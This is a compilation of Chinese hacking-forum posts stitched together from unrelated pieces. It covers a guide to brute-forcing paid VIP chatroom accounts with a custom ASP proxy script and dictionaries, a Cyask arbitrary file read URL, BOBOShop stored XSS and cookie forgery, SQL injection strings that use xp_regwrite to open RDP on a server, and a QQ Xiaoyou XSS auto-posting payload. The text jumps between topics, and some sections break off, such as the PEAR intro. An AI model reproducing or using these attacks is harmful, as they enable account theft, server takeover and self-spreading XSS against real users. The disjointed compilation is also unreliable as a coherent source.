BY Flyh4t

http://bbs.wolvez.org

上次硬盘坏了丢了很多数据

今天某兄弟生日

掏空我的记忆回想起来一个很老的漏洞

漏洞介绍：PEAR是PHP的官方开源类库, PHP Extension and Application Repository的缩写。PEAR将PHP程序开发过程中常用的功能编写成类库，涵盖了页面呈面、数据库访问、文件操作、数据结构、缓存操作、网络协议等许多方面，用户可以很方便地使用。它是一个PHP扩展及应用的一个代码仓库，简单地说，PEAR就是PHP的cpan。但是80sec发现，Pear的Mail模块存在安全漏洞，某些情况下将导致用户以webserver权限在主机上读写操作系统任意文件，继而控制主机执行php代码等。
漏洞分析：PEAR的Mail包错误地使用escapeShellCmd来过滤传入到sendmail命令的用户参数，用户提交精心构造的参数即可调用sendmail的其他参数，即可在操作系统上读写任意文件。

　　首先看看网页，如图1所示，大致了解了一下，这个聊天室是用meChat架构的。到meChat官方网站看了看，发现了最关键的一句，本系统无需任何Web Server和数据库系统支持，完全独立运行，所以什么Web注入、上传漏洞、IIS写权限漏洞基本就不可以用了。这时我能想到的就是Web探测了，制作一个用户字典和密码字典，因为总会有弱智的密码吧?至于探测软件呢，我能想到的就是小榕的溯雪，个人觉得这个最好用了。以下就介绍我是怎么做的吧，至于分析嘛，本来就没什么技术含量，就不做了。

　　第一步制作字典。字典的制作很关键，试想本来就没有这些用户又何来猜解呢?因此就得想办法知道有哪些用户名，然后做成字典。怎么获取用户名呢?这让我想起刚才登录进去的事情，它不是有在线用户列表吗?呵呵……那就再登录一次，不过我在看用户列表的时候发现一个很有趣的现象，就是大多数用户的用户名都是数字，都是8XXX这样的构成。这里我做了一个猜测，因为VIP用户是不能自己注册的，必须由管理员开启，那么就有可能管理员为了方便或者其他目的，这些VIP的用户名都是8000以上的递增数。所以我做了一个8000～9000这样的用户字典。至于密码字典，我就用比较常见的或者弱智的密码，比如123456、5201314……这样字典就做好了。

　　第二步是构造登录表单。这个聊天室的登录表单是利用JavaScript构造表单数据提交的，也就是说直接用溯雪提取表单元素来进行探测是不行的。经过分析，我发现提交的表单数据有Alias(用户名)、Password(密码)和RoomID(房间ID)，所以构造了如下的表单。

　　<form name="form1" method="post" action="http://xxxxxx.net:2899/1/Login">
　　<table width="100%" border="1" cellspacing="0" cellpadding="0">
　　<tr>
　　<td>RoomID</td>
　 <td><input name="RoomId" type="text" id="RoomId" value=”101”></td>
　　</tr>
　　<tr>
　　<td>Alias</td>
　　<td><input name="Alias" type="text" id="Alias"></td>
　　</tr>
　　<tr>
　　<td>Password</td>
　　<td><input name="Password" type="text" id="Password"></td>
　　</tr>
　　<tr>
　　<td>&nbsp;</td>
　　<td><input type="submit" name="Submit" value="提交"></td>
　　</tr>
　　</table>
　　</form>

　　这里需要说明的是Form的Action地址，它的构造需要看登录页面的源代码。在源代码中有这样类型的JavaScript语句：

　　var Server = new ChatServer() ;

　　Server.Add(101,'1房:会员大厅','/1/',12,28,0,'本网站不允许任何人互发联系方式，经发现立即永久封杀号码，并扣除分数.希望会员宝贝尊重网站规定!愿大家玩的开心','006,008,009,05,8001,8002,8003,8006,8008,8009',0,1,0,0,1,1,1,0,'');

　　其中101为RoomID，“/1/”为Action地址中的“/1/”，这要根据实际聊天室的源代码修改。

　　第三步是制作本地代理登
录脚本。本来没有这一步的，但是因为溯雪会把地址中的“http://”自动去掉，导致URL语法错误，不能正常使用。可能其它的Web探测器不会出现这个错误，但是我只有溯雪，只能自己寻求办法解决了。我的办法是在本地Web服务器放一个ASP脚本，让它获取溯雪提交的数据，然后代理提交给聊天室登录获得返回给溯雪。我制作了一个chat.asp程序，其代码如下。

　　<%
　　Function GetHttpPage(HttpUrl)
　　If IsNull(HttpUrl)=True Or HttpUrl="$False$" Then
　　GetHttpPage="$False$"
　　Exit Function
　　End If
　　Dim Http
　　Set Http=server.createobject("MSXML2.XMLHTTP")
　　Http.open "GET",HttpUrl,False
　　Http.Send()
　　If Http.Readystate<>4 then
　　Set Http=Nothing
　　GetHttpPage="$False$"
　　Exit function
　　End if
　　GetHTTPPage=bytesToBSTR(Http.responseBody,"GB2312")
　　Set Http=Nothing
　　If Err.number<>0 then
　　Err.Clear
　　End If
　　End Function
　　Function BytesToBstr(Body,Cset)
　　Dim Objstream
　　Set Objstream = Server.CreateObject("adodb.stream")
　 objstream.Type = 1
　　objstream.Mode =3
　　objstream.Open
　　objstream.Write body
　　objstream.Position = 0
　 objstream.Type = 2
　　objstream.Charset = Cset
　　BytesToBstr = objstream.ReadText
　　objstream.Close
　　set objstream = nothing
　　End Function

　　HttpUrl="http://xxxx.com:5000/1/Login/?Alias="&Request.Form("Alias")&"&Password="&Request.Form("Password")&"&RoomID="&Request.Form("RoomID")&"&boxfunc=off&RoomPassword=&Sex="

　　StarGet = GetHttpPage(HttpUrl)     %>

　　<%=Server.HTMLEncode(StarGet)%>

　　然后再把刚才构造的登录表单提交地址改成：http://localhost/chat.asp，这样准备工作就完成了，至于怎么使用溯雪呢，我这里只简单地说一下。运行溯雪，将刚才构造的登录表单保存成HTML网页，鼠标单击把它拖到溯雪程序框里，然后选择模式为标准模式，按快捷键Ctrl+I提取表单，在loginPath处输入“/1/”，RoomID处输入“101”，Alias选择用户字典，password选择密码字典，效果如图2所示。接下来按Ctrl+R运行，这是一次错误探测，会返回登录错误的信息，然后让你输入错误标记，这里填写“errorpassword.htm”就可以了。再次提交程序就开始探测了(再按Ctrl+R)，我想要不了多久，你就会得到一个别人花150元才能买到的VIP账户了。

　　上面的方法比较麻烦，同时还需要IIS支持，所以我自己做了一个破解小工具，给那些和我一样懒的人用。该程序是用C#做的，要在Microsoft .NET Framework 1.1以上才能使用，下面就简单介绍一下吧。运行界面如图3所示，参数设置就不用说了，中文写的很清楚。特别说明一下的是用户名作为密码功能，因为有很多人喜欢把用户名作为密码使用的，大家不妨试一下!最后再说一下，关于用户名规律的发现，大家可以看这个聊天室源代码中的Server.Add(101,'1房:会员大厅','/1/',……0,1,0,0,1,1,1,0,'')，或者加入他们的qq群自己去发现。

影响版本:
Cyask

程序介绍:
Cyask国内较为多人使用的仿百度风格的Ask系统。

漏洞分析:

从Collect.php代码当中可以看到

else  
{    
/*  
检查网址  
*/  
$url=get_referer();    
$neturl=emptyempty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);    
  
$collect_url=emptyempty($neturl) ? $url : $neturl;    
  
$contents = ”;    
if($fid=@fopen($collect_url,”r“))    
{    
do  
{    
$data = fread($fid, 4096);    
if (strlen($data) == 0)    
{    
break;    
}    
$contents .= $data;    
}    
while(true);    
fclose($fid);    
}    
else  
{    
show_message(’collect_url_error’, ”);    
exit;    
}    

漏洞利用:
http://www.target.com/collect.php?neturl=config.inc.php

解决方案:
厂商补丁：
cyask
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

flaw0r's Blog

版本:BOBOShop V1.0 Style1
系统:ASP+ACCESS
BOBO购物管理系统是国内最先进的购物系统，采用asp+fso技术;傻瓜式的程序安装和调试;用户无需考虑系统的安装维护;美观、友好的展示铺面;设计中应用了多种网络安全技术;顾客可以方便的查询并订购商品;用户可以方便的定义各种商品信息;系统选用强大的数据库保存各类信息;系统支持多种浏览器;功能模块清晰实用强大;系统有着良好的扩充性和升级性;强大的在线支付系统和订单系统;
全面的安全性处理：数据库防下载处理、CONN防止暴库处理、防止跨站脚本攻击、SQL注入式攻击防范、禁止脱机浏览工具浏览、后台登陆采用验证码验证、会员密码采用MD5方式加密、防范未知IP访问及软件攻击、管理员密码采用MD5方式加密、过滤sql注入代码及HTML代码防护、进行数据来源安全性监测，跨站脚本防范、管理员登陆日至记录，非法操作代码日至记录
漏洞一：留言跨站
网站留言页面为gbook.asp，下面看一下有问题的代码：
function HTMLEncode2(fString)

fString = Replace(fString, CHR(13), "")

fString = Replace(fString, CHR(10) & CHR(10), "</P><>")

fString = Replace(fString, CHR(10), "<BR>")

HTMLEncode2 = fString

end function
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from shop_fk",conn,1,3
rs.addnew
rs("fksubject")=trim(request("fksubject"))
rs("fkleixing")=request("fkleixing")
rs("fkcontent")=htmlencode2(trim(request("fkcontent")))
rs("fkusername")=trim(request("fkusername"))
rs("fkemail")=trim(request("fkemail"))
rs("fktel")=trim(request("fktel"))
rs("fklaizi")=trim(request("fklaizi"))
rs("fkdate")=now
rs("fkip")=Request.ServerVariables("remote_addr")
rs.update
rs.close
set rs=nothing
作者首先定义了一个HTML的过滤函数，HTMLEncode2，但这个函数并没有过滤<和>,至于跨站能不能成功，还要看后台查看留言的文件有没有做进一步的过滤，因为留言是直接发给管理员的。那么我们来看一下后台查看留言的文件viewfk.asp，有问题代码如下：
<table width="80%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td align="center">
<b><%=trim(rs("fksubject"))%></b>
</td>
</tr>
<tr>
<td>
<%=trim(rs("fkcontent"))%><br>
<%="发表时间："&rs("fkdate")%>
</td>
</tr>
</table>
大家可以很清楚的看到fksubject和fkcontent仅仅过滤了左右空格，导致我们可以跨站成功。
利用如图所示，我们在留言内容处写入跨站测试代码<script>alert(/xss/)</script>

当管理员查看我们的留言时就会成功执行我们的跨站测试代码，效果如下图：

至于跨站的高级应用，就看大家的发挥了。

漏洞二：cookie欺骗

漏洞存在文件：1.huansuan.asp漏洞代码如下：
<%
if request.Cookies("BOB")("username")="" then
response.Redirect "user.asp"
response.End
end if
………………………….省略代码
%>
2.gouwu.asp漏洞代码如下
dim bookid,username,action
action=request.QueryString("action")
if request.Cookies("BOB")("username")<>"" then
username=trim(request.Cookies("BOB")("username"))
else
if request.Cookies("BOB")("dingdanusername")="" then
username=now()
username=replace(trim(username),"-","")
username=replace(username,":","")
username=replace(username," ","")
response.Cookies("BOB")("dingdanusername")=username
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from [user] ",conn,1,3
rs.addnew
rs("username")=username
rs("niming")=1
rs.update
rs.close
set rs=nothing
else
username=request.Cookies("BOB")("dingdanusername")
end if
end if

cookie信息如下所示：
reglx%3D=1&yucun=0&jifen=0&username=flaw0rlx=1&jiaoyijine=0
usercookies=1&userid=4439&userhidden=2&password=965eb72c92a549dd&userclass=1&username=flaw0r
我们很容易伪造信息。其中reglx=1为普通用户，reglx=2为VIP用户
3.dingdan.asp
<%if request.Cookies("BOB")("username")="" then
response.write "<script. language=javascript>alert('对不起，您还没有登陆！');history.go(-1);</script>"
response.End
end if%>
这套系统还有很多文件存在上述的cookie欺骗漏洞，在此不一一列举

3389登陆关键注册表位置：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections
其中键值DenyTSConnections 直接控制着3389的开启和关闭。当该键值为0表示3389开启，1则表示关闭。而MSSQL的xp_regwrite的存储过程可以对注册进行修改。我们使用这点就可以简单的修改DenyTSConnections键值，从而控制3389的关闭和开启。

开启3389的SQL语句：
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--

关闭3389的SQL语句：
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;

作者:孤鸿影

作者已通知腾讯。

漏洞一:

QQ校友 班级共享硬盘 上传文件时对文件描述没有做任何过滤,导致XSS。

QQ校友使用了Ajax技术，来显示文件列表。在文件Msharemsg.js中使用innerHTML输出文件列表的HTML代码。由于使用了innerHTML，所以直接插入代码: <script>alert('孤鸿影')</script>不会被执行。使用下面的格式既可：<script defer>alert('孤鸿影')</script>。加入defer属性，那么浏览器在下载脚本的时候就不会立即对其进行处理，而是继续对页面进行下载和解析。这样我们插入的JavaScript就能正常运行。

漏洞二:

QQ校友在发blog时对插入图片过滤不严格，存在xss漏洞

在发blog时将插入图片URL写为如下代码即可触发：

xy.js的作用是自动发布一篇日志,这篇日志中可以插入恶意代码,代码如下：var url="/index.php?mod=blog&act=dopost";

var content="blog_content=By%3A%E5%AD%A4%E9%B8%BF%E5%BD%B1&blog_title=XSS+test&category=%E4%B8%AA%E4%BA%BA%E6%97%A5%E8%AE%B0";   //日志内容,这里可以插入恶意代码

function _sd_Post(Url,  Args)

{

var xmlhttp;

var error;

eval('try {xmlhttp  = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {xmlhttp  = null;error=e;}');

if(null != xmlhttp)

{

xmlhttp.Open("POST",  Url, false);

xmlhttp.setRequestHeader("x-requested-with",  "XMLHttpRequest");

xmlhttp.setRequestHeader("Referer",  "http://xy.qq.com/api_proxy.html");

xmlhttp.setRequestHeader("Accept",  "application/json, text/javascript, */*");

xmlhttp.setRequestHeader("Content-Type",  "application/x-www-form-urlencoded");

xmlhttp.setRequestHeader("Host",  "xy.qq.com");

xmlhttp.Send(Args);

strText = xmlhttp.responseText;

}

}

_sd_Post(url,content);